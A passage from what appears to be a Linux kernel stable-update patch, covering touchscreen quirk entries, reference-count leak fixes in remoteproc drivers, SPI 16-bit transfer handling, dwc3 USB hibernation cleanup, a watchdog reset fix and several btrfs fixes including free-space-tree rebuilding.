+ 	PROPERTY_ENTRY_U32("touchscreen-size-x", 1980),
+ 	PROPERTY_ENTRY_U32("touchscreen-size-y", 1500),
+@@ -378,6 +394,11 @@ static const struct ts_dmi_data gdix1001_01_upside_down_data = {
+ 	.properties	= gdix1001_upside_down_props,
+ };
+ 
++static const struct ts_dmi_data gdix1002_00_upside_down_data = {
++	.acpi_name	= "GDIX1002:00",
++	.properties	= gdix1001_upside_down_props,
++};
++
+ static const struct property_entry gp_electronic_t701_props[] = {
+ 	PROPERTY_ENTRY_U32("touchscreen-size-x", 960),
+ 	PROPERTY_ENTRY_U32("touchscreen-size-y", 640),
+@@ -1185,6 +1206,14 @@ const struct dmi_system_id touchscreen_dmi_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "7W"),
+ 		},
+ 	},
++	{
++		/* DEXP Ursus KX210i */
++		.driver_data = (void *)&dexp_ursus_kx210i_data,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "INSYDE Corp."),
++			DMI_MATCH(DMI_PRODUCT_NAME, "S107I"),
++		},
++	},
+ 	{
+ 		/* Digma Citi E200 */
+ 		.driver_data = (void *)&digma_citi_e200_data,
+@@ -1295,6 +1324,18 @@ const struct dmi_system_id touchscreen_dmi_table[] = {
+ 			DMI_MATCH(DMI_BIOS_VERSION, "jumperx.T87.KFBNEEA"),
+ 		},
+ 	},
++	{
++		/* Juno Tablet */
++		.driver_data = (void *)&gdix1002_00_upside_down_data,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Default string"),
++			/* Both product- and board-name being "Default string" is somewhat rare */
++			DMI_MATCH(DMI_PRODUCT_NAME, "Default string"),
++			DMI_MATCH(DMI_BOARD_NAME, "Default string"),
++			/* Above matches are too generic, add partial bios-version match */
++			DMI_MATCH(DMI_BIOS_VERSION, "JP2V1."),
++		},
++	},
+ 	{
+ 		/* Mediacom WinPad 7.0 W700 (same hw as Wintron surftab 7") */
+ 		.driver_data = (void *)&trekstor_surftab_wintron70_data,
+diff --git a/drivers/remoteproc/imx_dsp_rproc.c b/drivers/remoteproc/imx_dsp_rproc.c
+index 95da1cbefacf0..506ec9565716b 100644
+--- a/drivers/remoteproc/imx_dsp_rproc.c
++++ b/drivers/remoteproc/imx_dsp_rproc.c
+@@ -627,15 +627,19 @@ static int imx_dsp_rproc_add_carveout(struct imx_dsp_rproc *priv)
+ 
+ 		rmem = of_reserved_mem_lookup(it.node);
+ 		if (!rmem) {
++			of_node_put(it.node);
+ 			dev_err(dev, "unable to acquire memory-region\n");
+ 			return -EINVAL;
+ 		}
+ 
+-		if (imx_dsp_rproc_sys_to_da(priv, rmem->base, rmem->size, &da))
++		if (imx_dsp_rproc_sys_to_da(priv, rmem->base, rmem->size, &da)) {
++			of_node_put(it.node);
+ 			return -EINVAL;
++		}
+ 
+ 		cpu_addr = devm_ioremap_wc(dev, rmem->base, rmem->size);
+ 		if (!cpu_addr) {
++			of_node_put(it.node);
+ 			dev_err(dev, "failed to map memory %p\n", &rmem->base);
+ 			return -ENOMEM;
+ 		}
+@@ -644,10 +648,12 @@ static int imx_dsp_rproc_add_carveout(struct imx_dsp_rproc *priv)
+ 		mem = rproc_mem_entry_init(dev, (void __force *)cpu_addr, (dma_addr_t)rmem->base,
+ 					   rmem->size, da, NULL, NULL, it.node->name);
+ 
+-		if (mem)
++		if (mem) {
+ 			rproc_coredump_add_segment(rproc, da, rmem->size);
+-		else
++		} else {
++			of_node_put(it.node);
+ 			return -ENOMEM;
++		}
+ 
+ 		rproc_add_carveout(rproc, mem);
+ 	}
+diff --git a/drivers/remoteproc/imx_rproc.c b/drivers/remoteproc/imx_rproc.c
+index 596e1440cca56..8a2a7112678c2 100644
+--- a/drivers/remoteproc/imx_rproc.c
++++ b/drivers/remoteproc/imx_rproc.c
+@@ -460,6 +460,7 @@ static int imx_rproc_prepare(struct rproc *rproc)
+ 
+ 		rmem = of_reserved_mem_lookup(it.node);
+ 		if (!rmem) {
++			of_node_put(it.node);
+ 			dev_err(priv->dev, "unable to acquire memory-region\n");
+ 			return -EINVAL;
+ 		}
+@@ -472,10 +473,12 @@ static int imx_rproc_prepare(struct rproc *rproc)
+ 					   imx_rproc_mem_alloc, imx_rproc_mem_release,
+ 					   it.node->name);
+ 
+-		if (mem)
++		if (mem) {
+ 			rproc_coredump_add_segment(rproc, da, rmem->size);
+-		else
++		} else {
++			of_node_put(it.node);
+ 			return -ENOMEM;
++		}
+ 
+ 		rproc_add_carveout(rproc, mem);
+ 	}
+diff --git a/drivers/remoteproc/rcar_rproc.c b/drivers/remoteproc/rcar_rproc.c
+index aa86154109c77..1ff2a73ade907 100644
+--- a/drivers/remoteproc/rcar_rproc.c
++++ b/drivers/remoteproc/rcar_rproc.c
+@@ -62,13 +62,16 @@ static int rcar_rproc_prepare(struct rproc *rproc)
+ 
+ 		rmem = of_reserved_mem_lookup(it.node);
+ 		if (!rmem) {
++			of_node_put(it.node);
+ 			dev_err(&rproc->dev,
+ 				"unable to acquire memory-region\n");
+ 			return -EINVAL;
+ 		}
+ 
+-		if (rmem->base > U32_MAX)
++		if (rmem->base > U32_MAX) {
++			of_node_put(it.node);
+ 			return -EINVAL;
++		}
+ 
+ 		/* No need to translate pa to da, R-Car use same map */
+ 		da = rmem->base;
+@@ -79,8 +82,10 @@ static int rcar_rproc_prepare(struct rproc *rproc)
+ 					   rcar_rproc_mem_release,
+ 					   it.node->name);
+ 
+-		if (!mem)
++		if (!mem) {
++			of_node_put(it.node);
+ 			return -ENOMEM;
++		}
+ 
+ 		rproc_add_carveout(rproc, mem);
+ 	}
+diff --git a/drivers/remoteproc/st_remoteproc.c b/drivers/remoteproc/st_remoteproc.c
+index a3268d95a50e6..e6bd3c7a950a2 100644
+--- a/drivers/remoteproc/st_remoteproc.c
++++ b/drivers/remoteproc/st_remoteproc.c
+@@ -129,6 +129,7 @@ static int st_rproc_parse_fw(struct rproc *rproc, const struct firmware *fw)
+ 	while (of_phandle_iterator_next(&it) == 0) {
+ 		rmem = of_reserved_mem_lookup(it.node);
+ 		if (!rmem) {
++			of_node_put(it.node);
+ 			dev_err(dev, "unable to acquire memory-region\n");
+ 			return -EINVAL;
+ 		}
+@@ -150,8 +151,10 @@ static int st_rproc_parse_fw(struct rproc *rproc, const struct firmware *fw)
+ 							   it.node->name);
+ 		}
+ 
+-		if (!mem)
++		if (!mem) {
++			of_node_put(it.node);
+ 			return -ENOMEM;
++		}
+ 
+ 		rproc_add_carveout(rproc, mem);
+ 		index++;
+diff --git a/drivers/remoteproc/stm32_rproc.c b/drivers/remoteproc/stm32_rproc.c
+index 7d782ed9e5896..23c1690b8d73f 100644
+--- a/drivers/remoteproc/stm32_rproc.c
++++ b/drivers/remoteproc/stm32_rproc.c
+@@ -223,11 +223,13 @@ static int stm32_rproc_prepare(struct rproc *rproc)
+ 	while (of_phandle_iterator_next(&it) == 0) {
+ 		rmem = of_reserved_mem_lookup(it.node);
+ 		if (!rmem) {
++			of_node_put(it.node);
+ 			dev_err(dev, "unable to acquire memory-region\n");
+ 			return -EINVAL;
+ 		}
+ 
+ 		if (stm32_rproc_pa_to_da(rproc, rmem->base, &da) < 0) {
++			of_node_put(it.node);
+ 			dev_err(dev, "memory region not valid %pa\n",
+ 				&rmem->base);
+ 			return -EINVAL;
+@@ -254,8 +256,10 @@ static int stm32_rproc_prepare(struct rproc *rproc)
+ 							   it.node->name);
+ 		}
+ 
+-		if (!mem)
++		if (!mem) {
++			of_node_put(it.node);
+ 			return -ENOMEM;
++		}
+ 
+ 		rproc_add_carveout(rproc, mem);
+ 		index++;
+diff --git a/drivers/scsi/qedi/qedi_main.c b/drivers/scsi/qedi/qedi_main.c
+index df2fe7bd26d1b..f530bb0364939 100644
+--- a/drivers/scsi/qedi/qedi_main.c
++++ b/drivers/scsi/qedi/qedi_main.c
+@@ -2450,6 +2450,9 @@ static void __qedi_remove(struct pci_dev *pdev, int mode)
+ 		qedi_ops->ll2->stop(qedi->cdev);
+ 	}
+ 
++	cancel_delayed_work_sync(&qedi->recovery_work);
++	cancel_delayed_work_sync(&qedi->board_disable_work);
++
+ 	qedi_free_iscsi_pf_param(qedi);
+ 
+ 	rval = qedi_ops->common->update_drv_state(qedi->cdev, false);
+diff --git a/drivers/soc/qcom/llcc-qcom.c b/drivers/soc/qcom/llcc-qcom.c
+index 9c6cf2f5d77ce..d4cba3b3c56c4 100644
+--- a/drivers/soc/qcom/llcc-qcom.c
++++ b/drivers/soc/qcom/llcc-qcom.c
+@@ -101,10 +101,11 @@ struct llcc_slice_config {
+ 
+ struct qcom_llcc_config {
+ 	const struct llcc_slice_config *sct_data;
+-	int size;
+-	bool need_llcc_cfg;
+ 	const u32 *reg_offset;
+ 	const struct llcc_edac_reg_offset *edac_reg_offset;
++	int size;
++	bool need_llcc_cfg;
++	bool no_edac;
+ };
+ 
+ enum llcc_reg_offset {
+@@ -401,6 +402,7 @@ static const struct qcom_llcc_config sdm845_cfg = {
+ 	.need_llcc_cfg	= false,
+ 	.reg_offset	= llcc_v1_reg_offset,
+ 	.edac_reg_offset = &llcc_v1_edac_reg_offset,
++	.no_edac	= true,
+ };
+ 
+ static const struct qcom_llcc_config sm6350_cfg = {
+@@ -850,7 +852,14 @@ static int qcom_llcc_probe(struct platform_device *pdev)
+ 		goto err;
+ 
+ 	drv_data->ecc_irq = platform_get_irq_optional(pdev, 0);
+-	if (drv_data->ecc_irq >= 0) {
++
++	/*
++	 * On some platforms, access to the EDAC registers is locked by
++	 * the bootloader, so probing the EDAC driver would result in a
++	 * crash. Hence, disable the creation of the EDAC platform device
++	 * on the problematic platforms.
++	 */
++	if (!cfg->no_edac) {
+ 		llcc_edac = platform_device_register_data(&pdev->dev,
+ 						"qcom_llcc_edac", -1, drv_data,
+ 						sizeof(*drv_data));
+diff --git a/drivers/spi/spi-fsl-cpm.c b/drivers/spi/spi-fsl-cpm.c
+index ee905880769e6..7832ce330b29d 100644
+--- a/drivers/spi/spi-fsl-cpm.c
++++ b/drivers/spi/spi-fsl-cpm.c
+@@ -21,6 +21,7 @@
+ #include <linux/spi/spi.h>
+ #include <linux/types.h>
+ #include <linux/platform_device.h>
++#include <linux/byteorder/generic.h>
+ 
+ #include "spi-fsl-cpm.h"
+ #include "spi-fsl-lib.h"
+@@ -120,6 +121,21 @@ int fsl_spi_cpm_bufs(struct mpc8xxx_spi *mspi,
+ 		mspi->rx_dma = mspi->dma_dummy_rx;
+ 		mspi->map_rx_dma = 0;
+ 	}
++	if (t->bits_per_word == 16 && t->tx_buf) {
++		const u16 *src = t->tx_buf;
++		u16 *dst;
++		int i;
++
++		dst = kmalloc(t->len, GFP_KERNEL);
++		if (!dst)
++			return -ENOMEM;
++
++		for (i = 0; i < t->len >> 1; i++)
++			dst[i] = cpu_to_le16p(src + i);
++
++		mspi->tx = dst;
++		mspi->map_tx_dma = 1;
++	}
+ 
+ 	if (mspi->map_tx_dma) {
+ 		void *nonconst_tx = (void *)mspi->tx; /* shut up gcc */
+@@ -173,6 +189,13 @@ void fsl_spi_cpm_bufs_complete(struct mpc8xxx_spi *mspi)
+ 	if (mspi->map_rx_dma)
+ 		dma_unmap_single(dev, mspi->rx_dma, t->len, DMA_FROM_DEVICE);
+ 	mspi->xfer_in_progress = NULL;
++
++	if (t->bits_per_word == 16 && t->rx_buf) {
++		int i;
++
++		for (i = 0; i < t->len; i += 2)
++			le16_to_cpus(t->rx_buf + i);
++	}
+ }
+ EXPORT_SYMBOL_GPL(fsl_spi_cpm_bufs_complete);
+ 
+diff --git a/drivers/spi/spi-fsl-spi.c b/drivers/spi/spi-fsl-spi.c
+index 5602f052b2b50..b14f430a699d0 100644
+--- a/drivers/spi/spi-fsl-spi.c
++++ b/drivers/spi/spi-fsl-spi.c
+@@ -177,26 +177,6 @@ static int mspi_apply_cpu_mode_quirks(struct spi_mpc8xxx_cs *cs,
+ 	return bits_per_word;
+ }
+ 
+-static int mspi_apply_qe_mode_quirks(struct spi_mpc8xxx_cs *cs,
+-				struct spi_device *spi,
+-				int bits_per_word)
+-{
+-	/* CPM/QE uses Little Endian for words > 8
+-	 * so transform 16 and 32 bits words into 8 bits
+-	 * Unfortnatly that doesn't work for LSB so
+-	 * reject these for now */
+-	/* Note: 32 bits word, LSB works iff
+-	 * tfcr/rfcr is set to CPMFCR_GBL */
+-	if (spi->mode & SPI_LSB_FIRST &&
+-	    bits_per_word > 8)
+-		return -EINVAL;
+-	if (bits_per_word <= 8)
+-		return bits_per_word;
+-	if (bits_per_word == 16 || bits_per_word == 32)
+-		return 8; /* pretend its 8 bits */
+-	return -EINVAL;
+-}
+-
+ static int fsl_spi_setup_transfer(struct spi_device *spi,
+ 					struct spi_transfer *t)
+ {
+@@ -224,9 +204,6 @@ static int fsl_spi_setup_transfer(struct spi_device *spi,
+ 		bits_per_word = mspi_apply_cpu_mode_quirks(cs, spi,
+ 							   mpc8xxx_spi,
+ 							   bits_per_word);
+-	else
+-		bits_per_word = mspi_apply_qe_mode_quirks(cs, spi,
+-							  bits_per_word);
+ 
+ 	if (bits_per_word < 0)
+ 		return bits_per_word;
+@@ -361,6 +338,22 @@ static int fsl_spi_prepare_message(struct spi_controller *ctlr,
+ 				t->bits_per_word = 32;
+ 			else if ((t->len & 1) == 0)
+ 				t->bits_per_word = 16;
++		} else {
++			/*
++			 * CPM/QE uses little endian for words > 8 bits,
++			 * so transform 16- and 32-bit words into 8-bit ones.
++			 * Unfortunately that doesn't work for LSB first, so
++			 * reject those for now.
++			 * Note: a 32-bit word with LSB first works iff
++			 * tfcr/rfcr is set to CPMFCR_GBL.
++			 */
++			if (m->spi->mode & SPI_LSB_FIRST && t->bits_per_word > 8)
++				return -EINVAL;
++			if (t->bits_per_word == 16 || t->bits_per_word == 32)
++				t->bits_per_word = 8; /* pretend it's 8 bits */
++			if (t->bits_per_word == 8 && t->len >= 256 &&
++			    (mpc8xxx_spi->flags & SPI_CPM1))
++				t->bits_per_word = 16;
+ 		}
+ 	}
+ 	return fsl_spi_setup_transfer(m->spi, first);
+@@ -594,8 +587,14 @@ static struct spi_master *fsl_spi_probe(struct device *dev,
+ 	if (mpc8xxx_spi->type == TYPE_GRLIB)
+ 		fsl_spi_grlib_probe(dev);
+ 
+-	master->bits_per_word_mask =
+-		(SPI_BPW_RANGE_MASK(4, 16) | SPI_BPW_MASK(32)) &
++	if (mpc8xxx_spi->flags & SPI_CPM_MODE)
++		master->bits_per_word_mask =
++			(SPI_BPW_RANGE_MASK(4, 8) | SPI_BPW_MASK(16) | SPI_BPW_MASK(32));
++	else
++		master->bits_per_word_mask =
++			(SPI_BPW_RANGE_MASK(4, 16) | SPI_BPW_MASK(32));
++
++	master->bits_per_word_mask &=
+ 		SPI_BPW_RANGE_MASK(1, mpc8xxx_spi->max_bits_per_word);
+ 
+ 	if (mpc8xxx_spi->flags & SPI_QE_CPU_MODE)
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index d2622378ce040..daa7673833557 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -2468,7 +2468,7 @@ static void __dwc3_gadget_set_speed(struct dwc3 *dwc)
+ 	dwc3_writel(dwc->regs, DWC3_DCFG, reg);
+ }
+ 
+-static int dwc3_gadget_run_stop(struct dwc3 *dwc, int is_on, int suspend)
++static int dwc3_gadget_run_stop(struct dwc3 *dwc, int is_on)
+ {
+ 	u32			reg;
+ 	u32			timeout = 2000;
+@@ -2487,17 +2487,11 @@ static int dwc3_gadget_run_stop(struct dwc3 *dwc, int is_on, int suspend)
+ 			reg &= ~DWC3_DCTL_KEEP_CONNECT;
+ 		reg |= DWC3_DCTL_RUN_STOP;
+ 
+-		if (dwc->has_hibernation)
+-			reg |= DWC3_DCTL_KEEP_CONNECT;
+-
+ 		__dwc3_gadget_set_speed(dwc);
+ 		dwc->pullups_connected = true;
+ 	} else {
+ 		reg &= ~DWC3_DCTL_RUN_STOP;
+ 
+-		if (dwc->has_hibernation && !suspend)
+-			reg &= ~DWC3_DCTL_KEEP_CONNECT;
+-
+ 		dwc->pullups_connected = false;
+ 	}
+ 
+@@ -2542,7 +2536,6 @@ static int dwc3_gadget_soft_disconnect(struct dwc3 *dwc)
+ 	 * bit.
+ 	 */
+ 	dwc3_stop_active_transfers(dwc);
+-	__dwc3_gadget_stop(dwc);
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
+ 	/*
+@@ -2579,7 +2572,19 @@ static int dwc3_gadget_soft_disconnect(struct dwc3 *dwc)
+ 	 * remaining event generated by the controller while polling for
+ 	 * DSTS.DEVCTLHLT.
+ 	 */
+-	return dwc3_gadget_run_stop(dwc, false, false);
++	ret = dwc3_gadget_run_stop(dwc, false);
++
++	/*
++	 * Stop the gadget after controller is halted, so that if needed, the
++	 * events to update EP0 state can still occur while the run/stop
++	 * routine polls for the halted state.  DEVTEN is cleared as part of
++	 * gadget stop.
++	 */
++	spin_lock_irqsave(&dwc->lock, flags);
++	__dwc3_gadget_stop(dwc);
++	spin_unlock_irqrestore(&dwc->lock, flags);
++
++	return ret;
+ }
+ 
+ static int dwc3_gadget_pullup(struct usb_gadget *g, int is_on)
+@@ -2633,7 +2638,7 @@ static int dwc3_gadget_pullup(struct usb_gadget *g, int is_on)
+ 
+ 		dwc3_event_buffers_setup(dwc);
+ 		__dwc3_gadget_start(dwc);
+-		ret = dwc3_gadget_run_stop(dwc, true, false);
++		ret = dwc3_gadget_run_stop(dwc, true);
+ 	}
+ 
+ 	pm_runtime_put(dwc->dev);
+@@ -4200,30 +4205,6 @@ static void dwc3_gadget_suspend_interrupt(struct dwc3 *dwc,
+ 	dwc->link_state = next;
+ }
+ 
+-static void dwc3_gadget_hibernation_interrupt(struct dwc3 *dwc,
+-		unsigned int evtinfo)
+-{
+-	unsigned int is_ss = evtinfo & BIT(4);
+-
+-	/*
+-	 * WORKAROUND: DWC3 revision 2.20a with hibernation support
+-	 * have a known issue which can cause USB CV TD.9.23 to fail
+-	 * randomly.
+-	 *
+-	 * Because of this issue, core could generate bogus hibernation
+-	 * events which SW needs to ignore.
+-	 *
+-	 * Refers to:
+-	 *
+-	 * STAR#9000546576: Device Mode Hibernation: Issue in USB 2.0
+-	 * Device Fallback from SuperSpeed
+-	 */
+-	if (is_ss ^ (dwc->speed == USB_SPEED_SUPER))
+-		return;
+-
+-	/* enter hibernation here */
+-}
+-
+ static void dwc3_gadget_interrupt(struct dwc3 *dwc,
+ 		const struct dwc3_event_devt *event)
+ {
+@@ -4241,11 +4222,7 @@ static void dwc3_gadget_interrupt(struct dwc3 *dwc,
+ 		dwc3_gadget_wakeup_interrupt(dwc);
+ 		break;
+ 	case DWC3_DEVICE_EVENT_HIBER_REQ:
+-		if (dev_WARN_ONCE(dwc->dev, !dwc->has_hibernation,
+-					"unexpected hibernation event\n"))
+-			break;
+-
+-		dwc3_gadget_hibernation_interrupt(dwc, event->event_info);
++		dev_WARN_ONCE(dwc->dev, true, "unexpected hibernation event\n");
+ 		break;
+ 	case DWC3_DEVICE_EVENT_LINK_STATUS_CHANGE:
+ 		dwc3_gadget_linksts_change_interrupt(dwc, event->event_info);
+@@ -4582,7 +4559,7 @@ int dwc3_gadget_suspend(struct dwc3 *dwc)
+ 	if (!dwc->gadget_driver)
+ 		return 0;
+ 
+-	dwc3_gadget_run_stop(dwc, false, false);
++	dwc3_gadget_run_stop(dwc, false);
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	dwc3_disconnect_gadget(dwc);
+@@ -4603,7 +4580,7 @@ int dwc3_gadget_resume(struct dwc3 *dwc)
+ 	if (ret < 0)
+ 		goto err0;
+ 
+-	ret = dwc3_gadget_run_stop(dwc, true, false);
++	ret = dwc3_gadget_run_stop(dwc, true);
+ 	if (ret < 0)
+ 		goto err1;
+ 
+diff --git a/drivers/watchdog/dw_wdt.c b/drivers/watchdog/dw_wdt.c
+index 52962e8d11a6f..61af5d1332ac6 100644
+--- a/drivers/watchdog/dw_wdt.c
++++ b/drivers/watchdog/dw_wdt.c
+@@ -635,7 +635,7 @@ static int dw_wdt_drv_probe(struct platform_device *pdev)
+ 
+ 	ret = dw_wdt_init_timeouts(dw_wdt, dev);
+ 	if (ret)
+-		goto out_disable_clk;
++		goto out_assert_rst;
+ 
+ 	wdd = &dw_wdt->wdd;
+ 	wdd->ops = &dw_wdt_ops;
+@@ -666,12 +666,15 @@ static int dw_wdt_drv_probe(struct platform_device *pdev)
+ 
+ 	ret = watchdog_register_device(wdd);
+ 	if (ret)
+-		goto out_disable_pclk;
++		goto out_assert_rst;
+ 
+ 	dw_wdt_dbgfs_init(dw_wdt);
+ 
+ 	return 0;
+ 
++out_assert_rst:
++	reset_control_assert(dw_wdt->rst);
++
+ out_disable_pclk:
+ 	clk_disable_unprepare(dw_wdt->pclk);
+ 
+diff --git a/fs/btrfs/block-rsv.c b/fs/btrfs/block-rsv.c
+index ec96285357e0a..2044f1e186297 100644
+--- a/fs/btrfs/block-rsv.c
++++ b/fs/btrfs/block-rsv.c
+@@ -122,7 +122,8 @@ static u64 block_rsv_release_bytes(struct btrfs_fs_info *fs_info,
+ 	} else {
+ 		num_bytes = 0;
+ 	}
+-	if (block_rsv->qgroup_rsv_reserved >= block_rsv->qgroup_rsv_size) {
++	if (qgroup_to_release_ret &&
++	    block_rsv->qgroup_rsv_reserved >= block_rsv->qgroup_rsv_size) {
+ 		qgroup_to_release = block_rsv->qgroup_rsv_reserved -
+ 				    block_rsv->qgroup_rsv_size;
+ 		block_rsv->qgroup_rsv_reserved = block_rsv->qgroup_rsv_size;
+diff --git a/fs/btrfs/ctree.c b/fs/btrfs/ctree.c
+index dcb510f38dda0..dbbae92ac23d8 100644
+--- a/fs/btrfs/ctree.c
++++ b/fs/btrfs/ctree.c
+@@ -4411,10 +4411,12 @@ int btrfs_del_items(struct btrfs_trans_handle *trans, struct btrfs_root *root,
+ int btrfs_prev_leaf(struct btrfs_root *root, struct btrfs_path *path)
+ {
+ 	struct btrfs_key key;
++	struct btrfs_key orig_key;
+ 	struct btrfs_disk_key found_key;
+ 	int ret;
+ 
+ 	btrfs_item_key_to_cpu(path->nodes[0], &key, 0);
++	orig_key = key;
+ 
+ 	if (key.offset > 0) {
+ 		key.offset--;
+@@ -4431,8 +4433,36 @@ int btrfs_prev_leaf(struct btrfs_root *root, struct btrfs_path *path)
+ 
+ 	btrfs_release_path(path);
+ 	ret = btrfs_search_slot(NULL, root, &key, path, 0, 0);
+-	if (ret < 0)
++	if (ret <= 0)
+ 		return ret;
++
++	/*
++	 * Previous key not found. Even if we were at slot 0 of the leaf we had
++	 * before releasing the path and calling btrfs_search_slot(), we now may
++	 * be in a slot pointing to the same original key - this can happen if
++	 * after we released the path, one or more items were moved from a
++	 * sibling leaf into the front of the leaf we had due to an insertion
++	 * (see push_leaf_right()).
++	 * If we hit this case and our slot is > 0, just decrement the slot
++	 * so that the caller does not process the same key again, which may or
++	 * may not break the caller, depending on its logic.
++	 */
++	if (path->slots[0] < btrfs_header_nritems(path->nodes[0])) {
++		btrfs_item_key(path->nodes[0], &found_key, path->slots[0]);
++		ret = comp_keys(&found_key, &orig_key);
++		if (ret == 0) {
++			if (path->slots[0] > 0) {
++				path->slots[0]--;
++				return 0;
++			}
++			/*
++			 * At slot 0, same key as before, it means orig_key is
++			 * the lowest, leftmost, key in the tree. We're done.
++			 */
++			return 1;
++		}
++	}
++
+ 	btrfs_item_key(path->nodes[0], &found_key, 0);
+ 	ret = comp_keys(&found_key, &key);
+ 	/*
+diff --git a/fs/btrfs/disk-io.c b/fs/btrfs/disk-io.c
+index 5b1b5e1a63c8f..acae82a5f8ee6 100644
+--- a/fs/btrfs/disk-io.c
++++ b/fs/btrfs/disk-io.c
+@@ -3215,23 +3215,34 @@ int btrfs_start_pre_rw_mount(struct btrfs_fs_info *fs_info)
+ {
+ 	int ret;
+ 	const bool cache_opt = btrfs_test_opt(fs_info, SPACE_CACHE);
+-	bool clear_free_space_tree = false;
++	bool rebuild_free_space_tree = false;
+ 
+ 	if (btrfs_test_opt(fs_info, CLEAR_CACHE) &&
+ 	    btrfs_fs_compat_ro(fs_info, FREE_SPACE_TREE)) {
+-		clear_free_space_tree = true;
++		rebuild_free_space_tree = true;
+ 	} else if (btrfs_fs_compat_ro(fs_info, FREE_SPACE_TREE) &&
+ 		   !btrfs_fs_compat_ro(fs_info, FREE_SPACE_TREE_VALID)) {
+ 		btrfs_warn(fs_info, "free space tree is invalid");
+-		clear_free_space_tree = true;
++		rebuild_free_space_tree = true;
+ 	}
+ 
+-	if (clear_free_space_tree) {
+-		btrfs_info(fs_info, "clearing free space tree");
+-		ret = btrfs_clear_free_space_tree(fs_info);
++	if (rebuild_free_space_tree) {
++		btrfs_info(fs_info, "rebuilding free space tree");
++		ret = btrfs_rebuild_free_space_tree(fs_info);
+ 		if (ret) {
+ 			btrfs_warn(fs_info,
+-				   "failed to clear free space tree: %d", ret);
++				   "failed to rebuild free space tree: %d", ret);
++			goto out;
++		}
++	}
++
++	if (btrfs_fs_compat_ro(fs_info, FREE_SPACE_TREE) &&
++	    !btrfs_test_opt(fs_info, FREE_SPACE_TREE)) {
++		btrfs_info(fs_info, "disabling free space tree");
++		ret = btrfs_delete_free_space_tree(fs_info);
++		if (ret) {
++			btrfs_warn(fs_info,
++				   "failed to disable free space tree: %d", ret);
+ 			goto out;
+ 		}
+ 	}
+diff --git a/fs/btrfs/file-item.c b/fs/btrfs/file-item.c
+index 6bb9fa961a6a1..4fab7da632594 100644
+--- a/fs/btrfs/file-item.c
++++ b/fs/btrfs/file-item.c
+@@ -47,13 +47,13 @@ void btrfs_inode_safe_disk_i_size_write(struct btrfs_inode *inode, u64 new_i_siz
+ 	u64 start, end, i_size;
+ 	int ret;
+ 
++	spin_lock(&inode->lock);
+ 	i_size = new_i_size ?: i_size_read(&inode->vfs_inode);
+ 	if (btrfs_fs_incompat(fs_info, NO_HOLES)) {
+ 		inode->disk_i_size = i_size;
+-		return;
++		goto out_unlock;
+ 	}
+ 
+-	spin_lock(&inode->lock);
+ 	ret = find_contiguous_extent_bit(&inode->file_extent_tree, 0, &start,
+ 					 &end, EXTENT_DIRTY);
+ 	if (!ret && start == 0)
+@@ -61,6 +61,7 @@ void btrfs_inode_safe_disk_i_size_write(struct btrfs_inode *inode, u64 new_i_siz
+ 	else
+ 		i_size = 0;
+ 	inode->disk_i_size = i_size;
++out_unlock:
+ 	spin_unlock(&inode->lock);
+ }
+ 
+diff --git a/fs/btrfs/free-space-cache.c b/fs/btrfs/free-space-cache.c
+index 6a8f2bd350f4b..4cd8e44cba4c5 100644
+--- a/fs/btrfs/free-space-cache.c
++++ b/fs/btrfs/free-space-cache.c
+@@ -861,15 +861,16 @@ static int __load_free_space_cache(struct btrfs_root *root, struct inode *inode,
+ 			}
+ 			spin_lock(&ctl->tree_lock);
+ 			ret = link_free_space(ctl, e);
+-			ctl->total_bitmaps++;
+-			recalculate_thresholds(ctl);
+-			spin_unlock(&ctl->tree_lock);
+ 			if (ret) {
++				spin_unlock(&ctl->tree_lock);
+ 				btrfs_err(fs_info,
+ 					"Duplicate entries in free space cache, dumping");
+ 				kmem_cache_free(btrfs_free_space_cachep, e);
+ 				goto free_cache;
+ 			}
++			ctl->total_bitmaps++;
++			recalculate_thresholds(ctl);
++			spin_unlock(&ctl->tree_lock);
+ 			list_add_tail(&e->list, &bitmaps);
+ 		}
+ 
+diff --git a/fs/btrfs/free-space-tree.c b/fs/btrfs/free-space-tree.c
+index 367bcfcf68f51..e040eea3937d7 100644
+--- a/fs/btrfs/free-space-tree.c
++++ b/fs/btrfs/free-space-tree.c
+@@ -1247,7 +1247,7 @@ out:
+ 	return ret;
+ }
+ 
+-int btrfs_clear_free_space_tree(struct btrfs_fs_info *fs_info)
++int btrfs_delete_free_space_tree(struct btrfs_fs_info *fs_info)
+ {
+ 	struct btrfs_trans_handle *trans;
+ 	struct btrfs_root *tree_root = fs_info->tree_root;
+@@ -1293,6 +1293,54 @@ abort:
+ 	return ret;
+ }
+ 
++int btrfs_rebuild_free_space_tree(struct btrfs_fs_info *fs_info)
++{
++	struct btrfs_trans_handle *trans;
++	struct btrfs_key key = {
++		.objectid = BTRFS_FREE_SPACE_TREE_OBJECTID,
++		.type = BTRFS_ROOT_ITEM_KEY,
++		.offset = 0,
++	};
++	struct btrfs_root *free_space_root = btrfs_global_root(fs_info, &key);
++	struct rb_node *node;
++	int ret;
++
++	trans = btrfs_start_transaction(free_space_root, 1);
++	if (IS_ERR(trans))
++		return PTR_ERR(trans);
++
++	set_bit(BTRFS_FS_CREATING_FREE_SPACE_TREE, &fs_info->flags);
++	set_bit(BTRFS_FS_FREE_SPACE_TREE_UNTRUSTED, &fs_info->flags);
++
++	ret = clear_free_space_tree(trans, free_space_root);
++	if (ret)
++		goto abort;
++
++	node = rb_first_cached(&fs_info->block_group_cache_tree);
++	while (node) {
++		struct btrfs_block_group *block_group;
++
++		block_group = rb_entry(node, struct btrfs_block_group,
++				       cache_node);
++		ret = populate_free_space_tree(trans, block_group);
++		if (ret)
++			goto abort;
++		node = rb_next(node);
++	}
++
++	btrfs_set_fs_compat_ro(fs_info, FREE_SPACE_TREE);
++	btrfs_set_fs_compat_ro(fs_info, FREE_SPACE_TREE_VALID);
++	clear_bit(BTRFS_FS_CREATING_FREE_SPACE_TREE, &fs_info->flags);
++
++	ret = btrfs_commit_transaction(trans);
++	clear_bit(BTRFS_FS_FREE_SPACE_TREE_UNTRUSTED, &fs_info->flags);
++	return ret;
++abort:
++	btrfs_abort_transaction(trans, ret);
++	btrfs_end_transaction(trans);
++	return ret;
++}
++
